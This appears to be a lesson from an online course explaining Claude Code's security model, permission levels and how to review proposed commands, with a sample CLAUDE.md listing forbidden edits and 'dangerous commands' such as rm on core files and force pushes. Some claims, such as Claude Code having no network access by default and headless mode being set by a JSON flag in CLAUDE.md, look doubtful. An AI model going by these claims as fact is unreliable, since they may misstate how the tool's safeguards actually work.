Lesson 39: Security Model Deep Dive

Day 39 of 50 · ~7 min read · Phase 5: Advanced Patterns

The Opening Question

Claude Code can:

Read any file in your project
Edit any file in your project
Run arbitrary shell commands
Create commits and push to git
Delete files (with permission)

This is powerful. But it's also terrifying if you think about it wrong.

Here's the real question: what's actually stopping Claude Code from reading your .env file, exfiltrating your database password, and pushing it to GitHub?

Think hard before reading on. The answer isn't "Anthropic's safety training" — it's something more architectural.

Discovery

Question 1: What's the threat model when an AI has shell access?

In Lesson 1, we framed Claude Code as "a junior developer sitting next to you." But now we need to ask: what if that junior developer was untrustworthy? What if their training was compromised? What if you couldn't see what they're doing?

The threat model has two parts:

What Claude Code intends to do — is the model itself reliable?
What Claude Code can actually do — what technical boundaries exist?

Most people focus on (1), but (2) is where Claude Code's security actually lives.

Think about this: if Claude Code wanted to exfiltrate data, how would it do that? It would need to send data somewhere — to a network endpoint, to GitHub, to email. Claude Code can't make network requests or send emails by default. It's sandboxed.

Follow-up: But it can edit files and run commands. Couldn't it modify a script to do something malicious?

Pause and think about the chain of actions that would need to happen.

Question 2: What is Claude Code's actual permission system?

You've learned about permissions in Lesson 17 (CLAUDE.md), but let's dig deeper.

Claude Code operates under three trust levels:

Level 1: Interactive Mode (Default)

Claude Code can read any file
Claude Code proposes edits and waits for you to approve
You see every command before it runs
You must explicitly click "confirm" or say "yes"
This is the safest mode because you're the approval gate

Level 2: Headless Mode (Opt-in)

Claude Code runs without your approval for each command
Used in CI/CD pipelines or scheduled tasks
Requires explicit setup in your CLAUDE.md: {"headless": true}
The trade-off: you get speed, you lose immediate oversight

Level 3: Custom Permissions (Advanced)

You can restrict Claude Code per-directory
Example: "Claude can read src/, but can't edit src/secrets/"
You can forbid dangerous commands: "No rm on critical files"
Permissions are declarative, not programmatic

Why does this matter? Because the permission system forces you to make security explicit. You can't accidentally give Claude Code dangerous access — you have to choose it.

Question 3: What's the difference between "harmless if untrusted" and "trustworthy"?

Here's a subtle distinction that changes everything:

Harmless if untrusted: Even if Claude Code's reasoning was compromised or adversarial, the architecture prevents harm. Example: Claude Code can't make network requests, so it can't exfiltrate data no matter how hard it tries.

Trustworthy: Claude Code's training and behavior can be relied upon to do the right thing, even if given the power to do the wrong thing.

Claude Code is designed with (1) — it's architecturally constrained. But you shouldn't confuse that with (2). The permission system and approval gates are additional safeguards that assume the model can be wrong or confused.

Think about this in your own work: you probably don't trust a junior developer with root access to production, even if they're well-intentioned. Why? Because mistakes happen. The same principle applies here.

Question 4: How do you review commands safely?

In interactive mode, Claude Code shows you each proposed command before it runs. But what if it proposes 20 commands in a row? Do you just hit "yes" on all of them?

No. Here's how to review safely:

Read the command carefully. What does it actually do? Does it match the stated goal?
Check the working directory. Is it running in the right place?
Look for side effects. Does it delete anything, modify environment variables, or make network calls?
Trust but verify. If something seems off, ask Claude Code to explain before approving.

Common red flags:

Commands with rm -rf on critical paths
Commands that modify .env or secrets files
Commands that clone from untrusted sources
Commands with shell globs that might match more than intended (rm *.tmp can go wrong)

Mental model: You're not reviewing Claude Code's character — you're reviewing its reasoning. A smart agent can make a dumb mistake. Your approval gate catches those.

The Insight

Claude Code's security doesn't rely on trusting the model — it's built on architectural constraints (no network access, sandboxing) and permission systems (interactive approval, directory-level controls, headless opt-in). Your job is to understand the threat model and use the permission system intentionally, reviewing commands before you execute them.

The mental model: Claude Code is powerful like a shell is powerful. A shell can do anything on your machine. That's not a bug, it's a feature — but you still use sudo carefully, you don't run scripts from untrusted sources, and you review commands before executing them. Same principle here.

Try It

Task: Set up intentional security for a real project.

Audit your permissions: Open your CLAUDE.md (or create one) and write out what you'd be comfortable letting Claude Code do:

# Security Model for [Project]

## What Claude Can Read
- Everything in `src/`
- `package.json`, `README.md`

## What Claude Can Edit
- Everything in `src/`
- Test files
- Documentation

## What Claude Cannot Edit
- `.env`, `.env.local` (secrets)
- `src/secrets/` directory
- Deployment configurations

## Dangerous Commands (Review First)
- Any command with `rm` on core files
- `npm publish`
- Git commands that modify history (`reset --hard`, `force push`)

Give Claude Code a task that would normally be risky (like refactoring a core module), and practice reviewing each command before approval.
Intentionally try something forbidden: Ask Claude Code to read .env or edit a secrets file. Notice how it declines or proposes alternatives.

Key Concepts Introduced

Concept	Definition
Threat model	The specific ways something could go wrong, and who/what could cause harm
Harmless if untrusted	A system that's secure even if the agent is compromised or adversarial
Interactive approval	Requiring human confirmation before each command is executed
Permission declaration	Explicitly stating what an agent can and cannot do, rather than hoping it will act safely
Sandboxing	Technical constraints that prevent certain actions (e.g., no network access)

Bridge to Lesson 40

You now understand how Claude Code's security model works. It's not magic — it's intentional design that assumes AI agents can make mistakes, so you build safeguards before mistakes happen.

But there's a new dimension we haven't explored yet: remote control.

What if you could push messages to Claude Code from your phone? From a webhook? From Slack? What if Claude Code could be a responsive agent that reacts to events, not just a tool you invoke from your terminal?

Tomorrow's question: How do you extend Claude Code beyond your local machine?

← Back to Curriculum · Lesson 40 →